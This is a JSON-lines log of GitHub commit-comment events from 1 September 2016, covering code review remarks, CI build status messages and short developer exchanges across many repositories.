{"id":"4503014316","type":"CommitCommentEvent","actor":{"login":"whchung"},"repo":{"name":"RadeonOpenCompute/hcc"},"payload":{"comment":{"id":18864873,"position":4,"line":123,"path":"lib/hsa/mcwamp_hsa.cpp","commit_id":"f8f82c7aa46b45cbc963f61a4139637c901cfe76","created_at":"2016-09-01T14:43:44Z","updated_at":"2016-09-01T14:43:44Z","body":"I just merged a pull request to fix this issue."}},"created_at":"2016-09-01T14:43:44Z"}
{"id":"4503019675","type":"CommitCommentEvent","actor":{"login":"daniktheboss"},"repo":{"name":"PrismarineMC/MagmaBlock"},"payload":{"comment":{"id":18864885,"position":null,"line":null,"path":null,"commit_id":"5d2256bed3c9f780915fac6b13dfbc646b96d19a","created_at":"2016-09-01T14:44:36Z","updated_at":"2016-09-01T14:44:36Z","body":"WAIT... THIS MAKES IT LESS LAGGY???"}},"created_at":"2016-09-01T14:44:36Z"}
{"id":"4503020214","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18864886,"position":null,"line":null,"path":null,"commit_id":"1a5d6d9e9477335b703501a89eea8858cd8a0064","created_at":"2016-09-01T14:44:41Z","updated_at":"2016-09-01T14:44:41Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 890](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12233&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-01T14:44:41Z"}
{"id":"4503020306","type":"CommitCommentEvent","actor":{"login":"mwiget"},"repo":{"name":"Igalia/snabb"},"payload":{"comment":{"id":18864887,"position":null,"line":null,"path":null,"commit_id":"ca80959509c3be1752ebaba7e3cc4785d72c69ab","created_at":"2016-09-01T14:44:42Z","updated_at":"2016-09-01T14:44:42Z","body":"cool and great to see this all taking shape and become part of Snabb! "}},"created_at":"2016-09-01T14:44:42Z"}
{"id":"4503021913","type":"CommitCommentEvent","actor":{"login":"MoonBrew"},"repo":{"name":"MoonBrew/genesis"},"payload":{"comment":{"id":18864892,"position":null,"line":null,"path":null,"commit_id":"f1ed2ce71153b3ab4504885507aa316f081d5748","created_at":"2016-09-01T14:44:56Z","updated_at":"2016-09-01T14:44:56Z","body":"Batsman class testing should be complete."}},"created_at":"2016-09-01T14:44:56Z"}
{"id":"4503023155","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/chorus"},"payload":{"comment":{"id":18864895,"position":null,"line":null,"path":null,"commit_id":"d475f2bf8839ccbb75f187127965b976a88563e9","created_at":"2016-09-01T14:45:12Z","updated_at":"2016-09-01T14:45:12Z","body":"TeamCity Chorus :: chorus-precise64-master Continuous [Build 2.6.663.d475f2bf8839ccbb75f187127965b976a88563e9](http://build.palaso.org/viewLog.html?buildId=76336&buildTypeId=bt323) outcome was **SUCCESS**\nSummary: Tests passed: 937, ignored: 56 Build time: 00:16:38"}},"created_at":"2016-09-01T14:45:12Z"}
{"id":"4503023429","type":"CommitCommentEvent","actor":{"login":"bradfrost"},"repo":{"name":"bradfrost/atomic-design"},"payload":{"comment":{"id":18864897,"position":56,"line":225,"path":"chapter-1.md","commit_id":"24197ac0c3889e59d58ec42025fadc1dff3934d3","created_at":"2016-09-01T14:45:14Z","updated_at":"2016-09-01T14:45:14Z","body":"@FullCreamMilkMan Looks like Material Design is capitalized by everyone else except on the actual Material Design website: https://en.wikipedia.org/wiki/Material_Design \r\n\r\nCurious on how you'd like to handle this. I never capitalize \"atomic design\" but many other people do, which I find interesting. Looks like Google is in the same boat. Literally every publication and resource capitalizes it, and I do feel like Material Design is an Official Thing, but I could go either way with it."}},"created_at":"2016-09-01T14:45:14Z"}
{"id":"4503027837","type":"CommitCommentEvent","actor":{"login":"DespairFactor"},"repo":{"name":"UBERROMS/device_huawei_angler"},"payload":{"comment":{"id":18864906,"position":null,"line":null,"path":null,"commit_id":"7c7c5fd5e8b7395a87d56a0334fca4a23f9668f6","created_at":"2016-09-01T14:45:55Z","updated_at":"2016-09-01T14:45:55Z","body":"@chadouming "}},"created_at":"2016-09-01T14:45:55Z"}
{"id":"4503028751","type":"CommitCommentEvent","actor":{"login":"abo-abo"},"repo":{"name":"abo-abo/worf"},"payload":{"comment":{"id":18864910,"position":null,"line":null,"path":null,"commit_id":"1776bd97cf186c4d5a234087f2b63d5a412b15f3","created_at":"2016-09-01T14:46:04Z","updated_at":"2016-09-01T14:46:04Z","body":"Yes, I can change the default to t."}},"created_at":"2016-09-01T14:46:04Z"}
{"id":"4503030621","type":"CommitCommentEvent","actor":{"login":"ivansandrk"},"repo":{"name":"GoogleChrome/chromeos_smart_card_connector"},"payload":{"comment":{"id":18864916,"position":null,"line":null,"path":null,"commit_id":"3f14a269873c74da3240ee09497215dc04a60c4b","created_at":"2016-09-01T14:46:22Z","updated_at":"2016-09-01T14:46:22Z","body":"lgtm"}},"created_at":"2016-09-01T14:46:22Z"}
{"id":"4503036985","type":"CommitCommentEvent","actor":{"login":"danhalliday"},"repo":{"name":"web-workshop-ltd/landing-page-1G"},"payload":{"comment":{"id":18864928,"position":12,"line":12,"path":"site/leigh.html","commit_id":"fa23e18ca823b7c280d33d4e3755fa984badc0d1","created_at":"2016-09-01T14:47:22Z","updated_at":"2016-09-01T14:47:22Z","body":"Given there's no styling going in here (CSS values are defaults), I'd leave it as `<p>` and just add the `small` class to the footer paragraph."}},"created_at":"2016-09-01T14:47:22Z"}
{"id":"4503040996","type":"CommitCommentEvent","actor":{"login":"danhalliday"},"repo":{"name":"web-workshop-ltd/landing-page-1G"},"payload":{"comment":{"id":18864936,"position":23,"line":23,"path":"site/leigh.html","commit_id":"fa23e18ca823b7c280d33d4e3755fa984badc0d1","created_at":"2016-09-01T14:48:02Z","updated_at":"2016-09-01T14:48:02Z","body":"Might consider using the `<footer>` element here. https://developer.mozilla.org/en/docs/Web/HTML/Element/footer"}},"created_at":"2016-09-01T14:48:02Z"}
{"id":"4503044696","type":"CommitCommentEvent","actor":{"login":"Kungsgeten"},"repo":{"name":"abo-abo/worf"},"payload":{"comment":{"id":18864943,"position":null,"line":null,"path":null,"commit_id":"1776bd97cf186c4d5a234087f2b63d5a412b15f3","created_at":"2016-09-01T14:48:35Z","updated_at":"2016-09-01T14:48:35Z","body":"I changed it myself in my init-file, just thought that it was unclear from the documentation."}},"created_at":"2016-09-01T14:48:35Z"}
{"id":"4503046873","type":"CommitCommentEvent","actor":{"login":"alexprut"},"repo":{"name":"alexprut/earth-defender"},"payload":{"comment":{"id":18864948,"position":4,"line":21,"path":"server/src/earth_defender_sup.erl","commit_id":"caecd77e2a12a54bdc8c1078642f6aaf46cbe7bc","created_at":"2016-09-01T14:48:56Z","updated_at":"2016-09-01T14:48:56Z","body":"Perchè hai tolto il spazio libero?"}},"created_at":"2016-09-01T14:48:56Z"}
{"id":"4503047050","type":"CommitCommentEvent","actor":{"login":"CelticMinstrel"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":18864951,"position":null,"line":null,"path":null,"commit_id":"22763798c7ed840c221f2aaef4b799d29044651e","created_at":"2016-09-01T14:48:58Z","updated_at":"2016-09-01T14:48:58Z","body":"That's strange... I didn't write the advancement tree walker (it was already there, maybe for help or something), but it literally checks the `advances_to` field, looks up each of those units, and recurses."}},"created_at":"2016-09-01T14:48:58Z"}
{"id":"4503048100","type":"CommitCommentEvent","actor":{"login":"sez11a"},"repo":{"name":"sez11a/liferay-docs"},"payload":{"comment":{"id":18864953,"position":11,"line":281,"path":"discover/deployment/articles-dxp/03-maintaining-liferay/02-patching-liferay.markdown","commit_id":"0f06f6535b995f8a96639c4e612437d2f759c922","created_at":"2016-09-01T14:49:09Z","updated_at":"2016-09-01T14:49:09Z","body":"Perfect; thank you @rotty3000 ! This will get published on Friday. "}},"created_at":"2016-09-01T14:49:09Z"}
{"id":"4503048185","type":"CommitCommentEvent","actor":{"login":"ivansandrk"},"repo":{"name":"GoogleChrome/chromeos_smart_card_connector"},"payload":{"comment":{"id":18864954,"position":44,"line":185,"path":"smart_card_connector_app/src/background.js","commit_id":"3291cb70d1b53ea1fb6ea80a2706a9ddc8be2033","created_at":"2016-09-01T14:49:10Z","updated_at":"2016-09-01T14:49:10Z","body":"Why would it be disposed at this point?"}},"created_at":"2016-09-01T14:49:10Z"}
{"id":"4503050053","type":"CommitCommentEvent","actor":{"login":"olabini"},"repo":{"name":"twtiger/nameserver"},"payload":{"comment":{"id":18864957,"position":6,"line":11,"path":"serialization_test.go","commit_id":"46433098f771ce6237337a18634ea23592aca643","created_at":"2016-09-01T14:49:26Z","updated_at":"2016-09-01T14:49:26Z","body":"I think changing the name of the helper function to something like bytesForAnswerFromIP(w,x,y,z int) make it clear enough."}},"created_at":"2016-09-01T14:49:26Z"}
{"id":"4503059363","type":"CommitCommentEvent","actor":{"login":"EMiroshko"},"repo":{"name":"OKchesterOK/TheNailRoom"},"payload":{"comment":{"id":18864971,"position":19,"line":105,"path":"thenailroom.css","commit_id":"310019a4d49674ddc742a85b51852c81d809902b","created_at":"2016-09-01T14:50:42Z","updated_at":"2016-09-01T14:50:42Z","body":"please, add extra line"}},"created_at":"2016-09-01T14:50:42Z"}
{"id":"4503059816","type":"CommitCommentEvent","actor":{"login":"ivansandrk"},"repo":{"name":"GoogleChrome/chromeos_smart_card_connector"},"payload":{"comment":{"id":18864973,"position":null,"line":null,"path":null,"commit_id":"3291cb70d1b53ea1fb6ea80a2706a9ddc8be2033","created_at":"2016-09-01T14:50:46Z","updated_at":"2016-09-01T14:50:46Z","body":"lgtm"}},"created_at":"2016-09-01T14:50:46Z"}
{"id":"4503061547","type":"CommitCommentEvent","actor":{"login":"alejo90"},"repo":{"name":"DefinitelyTyped/DefinitelyTyped"},"payload":{"comment":{"id":18864977,"position":null,"line":null,"path":null,"commit_id":"67827a1e39dc91bf66a79b04f36e9eb85e075e10","created_at":"2016-09-01T14:51:01Z","updated_at":"2016-09-01T14:51:01Z","body":"@BurtHarris we addressed the issue in #10919 and I submitted #10943 to fix it. It hasn't been merged yet."}},"created_at":"2016-09-01T14:51:01Z"}
{"id":"4503061868","type":"CommitCommentEvent","actor":{"login":"dcdowney"},"repo":{"name":"madhavsuresh/mta"},"payload":{"comment":{"id":18864978,"position":null,"line":null,"path":null,"commit_id":"f64f8a9af3a184c9d9f4084e85e88ecf9b64efff","created_at":"2016-09-01T14:51:05Z","updated_at":"2016-09-01T14:51:05Z","body":"Seems like great progress.\r\nCan we factor out some of the repetition for each command?  E.g. the /validate, /peermatch/get, /peermatch/create functionalities are similar to each other (first three lines are identical, remaining lines before the SQL are similar).  Can we capture that using a function that reads the request into a data structure?  "}},"created_at":"2016-09-01T14:51:05Z"}
{"id":"4503064594","type":"CommitCommentEvent","actor":{"login":"abo-abo"},"repo":{"name":"abo-abo/worf"},"payload":{"comment":{"id":18864985,"position":null,"line":null,"path":null,"commit_id":"1776bd97cf186c4d5a234087f2b63d5a412b15f3","created_at":"2016-09-01T14:51:30Z","updated_at":"2016-09-01T14:51:30Z","body":"The documentation may have deteriorated a bit, I don't have too much time to spend on it. Anyway, thanks for pointing it out.\r\n"}},"created_at":"2016-09-01T14:51:30Z"}
{"id":"4503065928","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18864986,"position":null,"line":null,"path":null,"commit_id":"23e52e0c9c03f815d17422ce437196386ca1eb4b","created_at":"2016-09-01T14:51:43Z","updated_at":"2016-09-01T14:51:43Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 891](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12235&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-01T14:51:43Z"}
{"id":"4503067279","type":"CommitCommentEvent","actor":{"login":"Arinerron"},"repo":{"name":"karatebuilderboy/Launcher"},"payload":{"comment":{"id":18864987,"position":null,"line":null,"path":null,"commit_id":"8ecec369499d2a6336e35c438b23a03e181f734b","created_at":"2016-09-01T14:51:56Z","updated_at":"2016-09-01T14:51:56Z","body":"@karatebuilderboy Sorry, this is the only way to contact you since I'm banned from scratch. Here you go: https://github.com/Arinerron/ScratchAPI"}},"created_at":"2016-09-01T14:51:56Z"}
{"id":"4503068007","type":"CommitCommentEvent","actor":{"login":"hughsando"},"repo":{"name":"HaxeFoundation/haxe"},"payload":{"comment":{"id":18864990,"position":null,"line":null,"path":null,"commit_id":"d07b476891f14e7f50f2c646817dd355f2296aea","created_at":"2016-09-01T14:52:04Z","updated_at":"2016-09-01T14:52:04Z","body":"Just a test to see if anyone was reading this.  I debated 'ios'.  I actually think top-level 'objc' is probably best, but this might conflict with an actual objc target."}},"created_at":"2016-09-01T14:52:04Z"}
{"id":"4503069742","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18864993,"position":null,"line":null,"path":null,"commit_id":"1a5d6d9e9477335b703501a89eea8858cd8a0064","created_at":"2016-09-01T14:52:24Z","updated_at":"2016-09-01T14:52:24Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 890](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12233&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Tests failed: 2 (2 new), passed: 205, ignored: 3 Build time: 00:07:42\n### Failed tests\n```\norg.genivi.sota.device_registry.test.DeviceResourceSpec.GET request with ?regex yields devices which match the regex.: <no details avaliable>\n\norg.genivi.sota.core.PackageResourceWordSpec: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-01T14:52:24Z"}
{"id":"4503070060","type":"CommitCommentEvent","actor":{"login":"roblourens"},"repo":{"name":"Microsoft/vscode"},"payload":{"comment":{"id":18864994,"position":null,"line":null,"path":null,"commit_id":"f20867bf71b65e87005104df631d5ec101f1aebe","created_at":"2016-09-01T14:52:26Z","updated_at":"2016-09-01T14:52:26Z","body":"trim will also remove newlines at the beginning, and more than one, if that's a problem for anyone."}},"created_at":"2016-09-01T14:52:26Z"}
{"id":"4503070361","type":"CommitCommentEvent","actor":{"login":"amadden80"},"repo":{"name":"icsvortex666/The-Cup-Game"},"payload":{"comment":{"id":18864995,"position":null,"line":null,"path":null,"commit_id":"7dbfcaa3d33b5ed9c519896feb90d48d9f871669","created_at":"2016-09-01T14:52:30Z","updated_at":"2016-09-01T14:52:30Z","body":"Cool!   I know this commit was general css work.  But the commit message does tell me specifically what this commit does.  Keep note of this.  I see MANY of your commit messages are very thoughtful.  "}},"created_at":"2016-09-01T14:52:30Z"}
{"id":"4503075520","type":"CommitCommentEvent","actor":{"login":"ajaybhatt003"},"repo":{"name":"jasonhejna/self_driving_pontoon_boat"},"payload":{"comment":{"id":18865003,"position":null,"line":null,"path":null,"commit_id":"497ce18352d1e411737972d314afd1dece8d9f9b","created_at":"2016-09-01T14:53:20Z","updated_at":"2016-09-01T14:53:20Z","body":"Hey @jasonhejna,I admire your work....my project requires me to interface arduino with pixhawk but have no idea how to do that....can you please explain me by a simple code how to collect serial data coming out of arduino by pixhawk and send to ground station.....lets say arduino is giving out data like 1,2.5 on serial port and the same data needs to be collected by pixhawk to send to ground station...kindly help when you get time"}},"created_at":"2016-09-01T14:53:20Z"}
{"id":"4503076537","type":"CommitCommentEvent","actor":{"login":"amadden80"},"repo":{"name":"LosGimenos/dumpthechump"},"payload":{"comment":{"id":18865004,"position":null,"line":null,"path":null,"commit_id":"474b48906e1a6ba9a85c267aade31f174f23fb2e","created_at":"2016-09-01T14:53:29Z","updated_at":"2016-09-01T14:53:29Z","body":"GREAT commit message.  This is the key feature added.  Let's think about committing a little more often.  We could have committed right after creating the package.json?  \r\n\r\nDoing great.  Keep it up."}},"created_at":"2016-09-01T14:53:29Z"}
{"id":"4503076758","type":"CommitCommentEvent","actor":{"login":"hughsando"},"repo":{"name":"HaxeFoundation/haxe"},"payload":{"comment":{"id":18865005,"position":null,"line":null,"path":null,"commit_id":"d07b476891f14e7f50f2c646817dd355f2296aea","created_at":"2016-09-01T14:53:31Z","updated_at":"2016-09-01T14:53:31Z","body":"... and it does actually work on mac, so better than ios."}},"created_at":"2016-09-01T14:53:31Z"}
{"id":"4503076777","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system-reference-page"},"payload":{"comment":{"id":18865006,"position":null,"line":null,"path":null,"commit_id":"9b2c2a0451125429fdaf031decd1ea441912ed07","created_at":"2016-09-01T14:53:31Z","updated_at":"2016-09-01T14:53:31Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/355/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-1690)."}},"created_at":"2016-09-01T14:53:31Z"}
{"id":"4503079761","type":"CommitCommentEvent","actor":{"login":"Cilenco"},"repo":{"name":"Cilenco/FeatureDiscovery"},"payload":{"comment":{"id":18865011,"position":null,"line":null,"path":null,"commit_id":"e2f76946a68f4bfeabc762775b88d013947c7c47","created_at":"2016-09-01T14:53:59Z","updated_at":"2016-09-01T14:53:59Z","body":"Hey Aerim, thanks for your report. Do you mean the whole background color (of the large circle) or the color of the view target?"}},"created_at":"2016-09-01T14:53:59Z"}
{"id":"4503079856","type":"CommitCommentEvent","actor":{"login":"dakshhmehta"},"repo":{"name":"laravel/framework"},"payload":{"comment":{"id":18865010,"position":null,"line":null,"path":null,"commit_id":"0135851f1a684bbc2f700bf8523fea295825f7ce","created_at":"2016-09-01T14:53:59Z","updated_at":"2016-09-01T14:53:59Z","body":"@GrahamCampbell - Dude you wasted our whole day in company at @Romin Interactive."}},"created_at":"2016-09-01T14:53:59Z"}
{"id":"4503086303","type":"CommitCommentEvent","actor":{"login":"strk"},"repo":{"name":"CartoDB/Windshaft-cartodb"},"payload":{"comment":{"id":18865029,"position":7,"line":10,"path":"NEWS.md","commit_id":"b56d110f5094e6eb8f39dbd875a4d6cc750584b9","created_at":"2016-09-01T14:55:03Z","updated_at":"2016-09-01T14:55:03Z","body":"Were the tools moved to their own repository ?\r\nIt was very useful to be able to create maps via commandline..."}},"created_at":"2016-09-01T14:55:03Z"}
{"id":"4503086409","type":"CommitCommentEvent","actor":{"login":"amadden80"},"repo":{"name":"LynnFleck/Lynn-s-Project-1-Game"},"payload":{"comment":{"id":18865030,"position":null,"line":null,"path":null,"commit_id":"ba526c9d36d26a4b78a2e44fe71bcd4debe3368e","created_at":"2016-09-01T14:55:04Z","updated_at":"2016-09-01T14:55:04Z","body":"For this commit, the message could have been \"include directions for the game\".  Start your commit messages mentally with \"This commit will ...\"  Sticking to this format will allow ALL of your commits to be in the same tense and style.  "}},"created_at":"2016-09-01T14:55:04Z"}
{"id":"4503086769","type":"CommitCommentEvent","actor":{"login":"isidorn"},"repo":{"name":"Microsoft/vscode"},"payload":{"comment":{"id":18865033,"position":null,"line":null,"path":null,"commit_id":"f20867bf71b65e87005104df631d5ec101f1aebe","created_at":"2016-09-01T14:55:09Z","updated_at":"2016-09-01T14:55:09Z","body":"you are right but I do not think it should be a problem. There are some issues with new line handling in the debug console which I plan to look into in September, then we can potentially revisit this if users complain"}},"created_at":"2016-09-01T14:55:09Z"}
{"id":"4503087234","type":"CommitCommentEvent","actor":{"login":"zeeraw"},"repo":{"name":"pogodevorg/pgoapi-go"},"payload":{"comment":{"id":18865034,"position":null,"line":null,"path":null,"commit_id":"7307f89c53255e1f6ce4ad369afba5e89e6cf0e6","created_at":"2016-09-01T14:55:14Z","updated_at":"2016-09-01T14:55:14Z","body":"@novikk Yes, the altitude is sent in another part of the request called LocationFix inside the signature. Not implemented here yet."}},"created_at":"2016-09-01T14:55:14Z"}
{"id":"4503089776","type":"CommitCommentEvent","actor":{"login":"dcdowney"},"repo":{"name":"madhavsuresh/mta"},"payload":{"comment":{"id":18865043,"position":null,"line":null,"path":null,"commit_id":"f64f8a9af3a184c9d9f4084e85e88ecf9b64efff","created_at":"2016-09-01T14:55:37Z","updated_at":"2016-09-01T14:55:37Z","body":"Also, is there any advantage to capturing that sql in a stored procedure?  Maybe not.  Just asking."}},"created_at":"2016-09-01T14:55:37Z"}
{"id":"4503091242","type":"CommitCommentEvent","actor":{"login":"emaxx-google"},"repo":{"name":"GoogleChrome/chromeos_smart_card_connector"},"payload":{"comment":{"id":18865048,"position":44,"line":185,"path":"smart_card_connector_app/src/background.js","commit_id":"3291cb70d1b53ea1fb6ea80a2706a9ddc8be2033","created_at":"2016-09-01T14:55:47Z","updated_at":"2016-09-01T14:55:47Z","body":"See the createClientHandler function implementation. For example, when the NaCl module crashed."}},"created_at":"2016-09-01T14:55:47Z"}
{"id":"4503091878","type":"CommitCommentEvent","actor":{"login":"ajaybhatt003"},"repo":{"name":"hughhugh/Pixhawk_Mavlink_arduino"},"payload":{"comment":{"id":18865050,"position":null,"line":null,"path":null,"commit_id":"43449930de8ee934ed8b2482d224e6dac94b0d50","created_at":"2016-09-01T14:55:52Z","updated_at":"2016-09-01T14:55:52Z","body":"Hey @hughhugh,I admire your work....my project requires me to interface arduino with pixhawk but have no idea how to do that....can you please explain me by a simple code how to collect serial data coming out of arduino by pixhawk and send to ground station.....lets say arduino is giving out data like 1,2.5 on serial port and the same data needs to be collected by pixhawk to send to ground station...kindly help when you get time"}},"created_at":"2016-09-01T14:55:52Z"}
{"id":"4503096534","type":"CommitCommentEvent","actor":{"login":"CelticMinstrel"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":18865057,"position":null,"line":null,"path":null,"commit_id":"3f10cc72ad7959ea0ebf79a320fe93779590a63c","created_at":"2016-09-01T14:56:33Z","updated_at":"2016-09-01T14:56:33Z","body":"This change doesn't feel like something that could make a difference between a valid iterator and an invalid one, but maybe I'm missing some implementation detail..."}},"created_at":"2016-09-01T14:56:33Z"}
{"id":"4503098860","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18865062,"position":null,"line":null,"path":null,"commit_id":"23e52e0c9c03f815d17422ce437196386ca1eb4b","created_at":"2016-09-01T14:56:55Z","updated_at":"2016-09-01T14:56:55Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 891](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12235&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Tests failed: 2 (1 new), passed: 27; compilation error: Scala compiler in Test (new) Build time: 00:05:12\n### Failed tests\n```\norg.genivi.sota.device_registry.test.DeviceResourceSpec.GET group_info after PUT should return what was updated.: <no details avaliable>\n\norg.genivi.sota.device_registry.test.DeviceResourceSpec.GET request with ?regex yields devices which match the regex.: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-01T14:56:55Z"}
{"id":"4503100338","type":"CommitCommentEvent","actor":{"login":"pr3ssh"},"repo":{"name":"CIECODE-Madrid/tipi"},"payload":{"comment":{"id":18865065,"position":12,"line":67,"path":"client/views/search/search.js","commit_id":"78b7f95ff96b948d19cfb8f74d252b9e57eea80c","created_at":"2016-09-01T14:57:11Z","updated_at":"2016-09-01T14:57:11Z","body":"@joseEnrique ¿Puedes revisar que estos son los valores posibles para el campo tramitación?"}},"created_at":"2016-09-01T14:57:11Z"}
{"id":"4503101973","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system-reference-page"},"payload":{"comment":{"id":18865066,"position":null,"line":null,"path":null,"commit_id":"4ae1cedac8eaa027d62e7742c16e4cae15c34e67","created_at":"2016-09-01T14:57:26Z","updated_at":"2016-09-01T14:57:26Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/356/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-1690)."}},"created_at":"2016-09-01T14:57:26Z"}
{"id":"4503103016","type":"CommitCommentEvent","actor":{"login":"HiFaraz"},"repo":{"name":"HiFaraz/node-playbook"},"payload":{"comment":{"id":18865067,"position":3,"line":150,"path":"README.md","commit_id":"c4100e15254f8bbbf1564a36f0250c08651fec11","created_at":"2016-09-01T14:57:36Z","updated_at":"2016-09-01T14:57:36Z","body":"Good catch!"}},"created_at":"2016-09-01T14:57:36Z"}
{"id":"4503103851","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18865069,"position":null,"line":null,"path":null,"commit_id":"9c35d1a8c55d1483386ae47ab523e47da90b82ec","created_at":"2016-09-01T14:57:44Z","updated_at":"2016-09-01T14:57:44Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 892](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12239&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-01T14:57:44Z"}
{"id":"4503104153","type":"CommitCommentEvent","actor":{"login":"amadden80"},"repo":{"name":"jh90/jericho"},"payload":{"comment":{"id":18865071,"position":null,"line":null,"path":null,"commit_id":"e6278635f64f1da39381ba0f88b164bfb731581a","created_at":"2016-09-01T14:57:47Z","updated_at":"2016-09-01T14:57:47Z","body":"Let's get some commits up here!"}},"created_at":"2016-09-01T14:57:47Z"}
{"id":"4503105237","type":"CommitCommentEvent","actor":{"login":"amadden80"},"repo":{"name":"nicklgaines/Project_01"},"payload":{"comment":{"id":18865073,"position":null,"line":null,"path":null,"commit_id":"6fb44a321924280ce174f62aca6fb7dddcc58370","created_at":"2016-09-01T14:57:57Z","updated_at":"2016-09-01T14:57:57Z","body":"Let's get some commits up here!"}},"created_at":"2016-09-01T14:57:57Z"}
{"id":"4503107754","type":"CommitCommentEvent","actor":{"login":"infolffl"},"repo":{"name":"infolffl/hello-world"},"payload":{"comment":{"id":18865079,"position":null,"line":null,"path":null,"commit_id":"62241340a1bd132da304a1f5fc2d0d1c283e7e30","created_at":"2016-09-01T14:58:21Z","updated_at":"2016-09-01T14:58:21Z","body":"version 1"}},"created_at":"2016-09-01T14:58:21Z"}
{"id":"4503108280","type":"CommitCommentEvent","actor":{"login":"pdeboer"},"repo":{"name":"CCI-MIT/XCoLab"},"payload":{"comment":{"id":18865082,"position":null,"line":null,"path":null,"commit_id":"34b7fa4b27da48d40386ea1aaf1151f4f104f556","created_at":"2016-09-01T14:58:26Z","updated_at":"2016-09-01T14:58:26Z","body":"looks good, thank you"}},"created_at":"2016-09-01T14:58:26Z"}
{"id":"4503108947","type":"CommitCommentEvent","actor":{"login":"gaspard"},"repo":{"name":"zena/versions"},"payload":{"comment":{"id":18865084,"position":null,"line":null,"path":null,"commit_id":"115509396d99b981c768e3f3127912a66c74c60f","created_at":"2016-09-01T14:58:32Z","updated_at":"2016-09-01T14:58:32Z","body":"Working hard !!"}},"created_at":"2016-09-01T14:58:32Z"}
{"id":"4503109381","type":"CommitCommentEvent","actor":{"login":"Iamblichos"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":18865085,"position":null,"line":null,"path":null,"commit_id":"666b26dabc7b738808b414feb3561275a4433bf8","created_at":"2016-09-01T14:58:35Z","updated_at":"2016-09-01T14:58:35Z","body":"Fixed:\r\n![20160901095454_1](https://cloud.githubusercontent.com/assets/14372214/18172290/71e05db4-702a-11e6-958c-84dbc8d16f79.jpg)\r\n\r\nThrough in a Carrier and a fighter just to make sure.\r\n\r\nJust to clarify something, in the base CP, Helicopter units don't have the deep embarkation stuff right? They'll embark on coast? Is the deep embark only in the CBP? I through a Helicopter in just to check."}},"created_at":"2016-09-01T14:58:35Z"}
{"id":"4503112622","type":"CommitCommentEvent","actor":{"login":"svanderburg"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18865092,"position":null,"line":null,"path":null,"commit_id":"5ce6cd0106242648ccc9e7ea64716a866eca152c","created_at":"2016-09-01T14:59:07Z","updated_at":"2016-09-01T14:59:07Z","body":"Solved it, but evaluation still failing because of an unrelated python problem...."}},"created_at":"2016-09-01T14:59:07Z"}
{"id":"4503114366","type":"CommitCommentEvent","actor":{"login":"bcjordan"},"repo":{"name":"code-dot-org/code-dot-org"},"payload":{"comment":{"id":18865094,"position":25,"line":110,"path":"apps/src/blockTooltips/DropletAutocompletePopupTooltipManager.js","commit_id":"574ae3d69c41d688db60f88766e7b69104fbcb8d","created_at":"2016-09-01T14:59:22Z","updated_at":"2016-09-01T14:59:22Z","body":"Interesting—given the conflicting reports in the issue description and on my manual testing right now I'm seeing it sometimes work but then trying again later it'll sometimes not work. The bug must be somehow past-behavior/state dependent (maybe not too surprising given the event dispatching order matters for the bug).\r\n\r\nThe comment description does seem to conflict with the method call—it sounds like per the comment that method call should be `addMouseDownTouchEvent`, and possible that method call was changed or reverted in the same session of that commit, and on final manual testing it still appeared to work since the error is past-behavior dependent / sometimes doesn't reproduce.\r\n\r\nThanks for tracking down!"}},"created_at":"2016-09-01T14:59:22Z"}
{"id":"4503116231","type":"CommitCommentEvent","actor":{"login":"NivShalmon"},"repo":{"name":"SpartanRefactoring/spartan-refactoring"},"payload":{"comment":{"id":18865100,"position":null,"line":null,"path":null,"commit_id":"b81ba616e4d2787f9ef0fccce9c63024647e6d27","created_at":"2016-09-01T14:59:39Z","updated_at":"2016-09-01T14:59:39Z","body":"There is a mistake in the commit's name, it's about issue #101"}},"created_at":"2016-09-01T14:59:39Z"}
